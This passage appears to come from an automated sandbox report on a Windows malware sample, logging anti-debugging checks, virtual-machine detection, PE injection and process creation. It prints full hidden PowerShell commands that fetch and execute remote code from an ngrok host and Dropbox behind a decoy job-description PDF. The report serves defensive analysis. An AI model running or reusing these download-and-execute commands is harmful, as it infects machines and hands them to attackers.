                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -592394s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593272
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593145
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593018
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592893
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592763
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592642
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592518
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592394
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A409E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: fontdrvhost.exe, 00000022.00000002.2879157308.000000000321B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx.dlllb
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A409E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2764066518.0000000005090000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                    Source: svchost.exe, 0000000C.00000002.3420384380.0000014A4D42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3422639743.0000014A52A54000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2879157308.000000000321B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: msedge.exe, 0000000A.00000003.2321396794.00002CFC00324000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2764066518.0000000005090000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A409E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E146939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                    Source: powershell.exe, 00000003.00000002.2474042605.000002E15D422000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000A.00000002.2420521717.000002A699C46000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2684869746.000001A0BBFB0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2493824273.0000024043443000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: fontdrvhost.exe, 00000022.00000002.2879586612.0000000003430000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 51%VMCi
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_027192CC VirtualAlloc,VirtualAlloc,VirtualProtect,LdrInitializeThunk,VirtualFree,33_3_027192CC
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_00479425 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00479425
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_02719277 mov eax, dword ptr fs:[00000030h]33_3_02719277
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_030E0283 mov eax, dword ptr fs:[00000030h]34_3_030E0283
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeProcess created: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe "C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe"
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_00479425 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00479425
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_00469ECC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00469ECC
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_2_00479425 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00479425
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_2_00469ECC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00469ECC

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeMemory written: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe base: 26E0000 value starts with: 4D5A
                    Maps a DLL or memory area into another process
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonlyJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\749209598.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\6d0157c6-3d7d-48ab-8ec3-f1e0d1f3d02e.pdf
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe "C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe"
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -noprofile -command "$randompdf = join-path -path $env:temp -childpath ('{0}.pdf' -f ([guid]::newguid())); $randomexe = join-path -path $env:temp -childpath ('{0}.exe' -f ([guid]::newguid())); invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -outfile $randompdf; start-process -filepath 'msedge.exe' -argumentlist '--kiosk', $randompdf; invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -outfile $randomexe; start-process -filepath $randomexe; if (test-path $randomexe) { invoke-webrequest -uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -noprofile -command "$randompdf = join-path -path $env:temp -childpath ('{0}.pdf' -f ([guid]::newguid())); $randomexe = join-path -path $env:temp -childpath ('{0}.exe' -f ([guid]::newguid())); invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -outfile $randompdf; start-process -filepath 'msedge.exe' -argumentlist '--kiosk', $randompdf; invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -outfile $randomexe; start-process -filepath $randomexe; if (test-path $randomexe) { invoke-webrequest -uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }"
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_00460FA0 cpuid 32_2_00460FA0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
